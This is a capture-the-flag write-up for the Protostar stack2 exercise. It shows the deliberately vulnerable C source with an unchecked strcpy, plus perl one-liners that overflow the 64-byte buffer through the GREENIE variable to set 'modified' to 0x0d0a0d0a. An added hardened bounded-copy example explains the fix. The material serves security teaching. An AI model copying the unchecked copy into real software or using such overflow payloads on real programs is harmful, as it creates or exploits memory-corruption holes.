Introduction
Protostar is a set of CTF-style exercises focused on Linux binary exploitation, each one a little harder than the last. An ISO containing the OS and all of the challenges can be downloaded.
The website with all information and downloads is at https://exploit-exercises.com/protostar/
Challenge
Test run
user@protostar:~$ /opt/protostar/bin/stack2
stack2: please set the GREENIE environment variable
Exploit
Make the program respond with the message "you have correctly modified the variable".

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>   /* errx(); the challenge source relies on an implicit declaration */

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  /* unbounded copy: anything longer than the 64-byte buffer spills into what follows it on the stack */
  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}
We can see that the success message is printed only if the 'modified' variable is equal to the hex value 0x0d0a0d0a.
First off we use the same trick as in challenge stack0 and corrupt the stack, but this time the input comes from the "GREENIE" environment variable, which is passed to the strcpy() call, and the overflow has to overwrite the "modified" variable. Because the machine is little-endian, the four bytes must be supplied in reverse order, so "CRLFCRLF" is written as 0x0a0d0a0d.
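As an added example (not the Protostar source or the author's code), the following C program shows the hardened counterpart of the unchecked strcpy() above and makes the byte-order point concrete. copy_env_bounded() refuses any input that does not fit in the 64-byte buffer together with its NUL terminator, so an adjacent stack variable can never be overwritten; first_byte_in_memory() shows that on a little-endian host 0x0d0a0d0a is stored starting with 0x0a. The buffer size and the 0x0d0a0d0a constant come from the challenge; all function names are assumptions of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER_SIZE 64                 /* same buffer size as stack2 */
#define EXPECTED_MODIFIED 0x0d0a0d0au  /* value stack2 compares against */

/* Copy src into dst[dst_size] only if it fits with its NUL terminator.
 * Returns 1 on success, 0 if src is too long (dst is then left empty).
 * Unlike strcpy(), this never writes past the end of dst. */
int copy_env_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || dst_size == 0)
        return 0;
    dst[0] = '\0';
    if (src == NULL)
        return 0;
    size_t len = 0;
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len >= dst_size)       /* no room for the terminator: reject */
        return 0;
    memcpy(dst, src, len + 1);
    return 1;
}

/* Hardened version of the stack2 check: 'modified' is set before the copy,
 * and the bounded copy cannot overrun, so it can only ever stay 0.
 * Returns 1 if stack2's success message would be printed, else 0. */
int hardened_stack2(const char *variable)
{
    volatile uint32_t modified = 0;
    char buffer[BUFFER_SIZE];
    (void)copy_env_bounded(buffer, sizeof buffer, variable);
    return modified == EXPECTED_MODIFIED;
}

/* Constructed input, like the writeup's perl one-liners: n bytes of 'A'.
 * Returns 1 if the bounded copy accepts it into a BUFFER_SIZE buffer. */
int accepts_input_of_length(size_t n)
{
    char buffer[BUFFER_SIZE];
    char *input = malloc(n + 1);
    if (input == NULL)
        return 0;
    memset(input, 'A', n);
    input[n] = '\0';
    int ok = copy_env_bounded(buffer, sizeof buffer, input);
    free(input);
    return ok;
}

/* First byte a 32-bit value occupies in memory. On a little-endian host
 * this is the least significant byte: 0x0a for 0x0d0a0d0a. */
unsigned char first_byte_in_memory(uint32_t value)
{
    unsigned char bytes[4];
    memcpy(bytes, &value, sizeof bytes);
    return bytes[0];
}

int main(void)
{
    printf("63 'A's: %s\n", accepts_input_of_length(63) ? "copied" : "rejected");
    printf("65 'A's: %s\n", accepts_input_of_length(65) ? "copied" : "rejected");
    printf("hardened check with 65 'A's prints success: %d\n",
           hardened_stack2("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"));
    printf("first byte of 0x%08x in memory: 0x%02x\n",
           EXPECTED_MODIFIED, first_byte_in_memory(EXPECTED_MODIFIED));
    return 0;
}
```

The 65-byte input that overwrote the low byte of 'modified' in the original binary is simply rejected by the bounded copy, which is the fix a code reviewer would ask for here: check the length against the destination size, or use a bounded copy that reports truncation, rather than trusting the length of an environment variable.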
Let's see:
user@protostar:~$ GREENIE=`perl -e 'print "A"x65'` && export GREENIE && /opt/protostar/bin/stack2
Try again, you got 0x00000041
Using perl we were able to overflow the 64-byte 'buffer'. We put 65 A's into GREENIE, one byte more than was allocated, and strcpy() carried that extra byte into the 'modified' variable.
The result 0x00000041 shows we hit one byte of modified with 0x41 = 'A'.
With some experimenting we are able to get the desired value into modified:
user@protostar:~$ GREENIE=`perl -e 'print "A"x64 . "\x0a\x0d\x0a\x0d"'` && export GREENIE && /opt/protostar/bin/stack2
you have correctly modified the variable
Thank you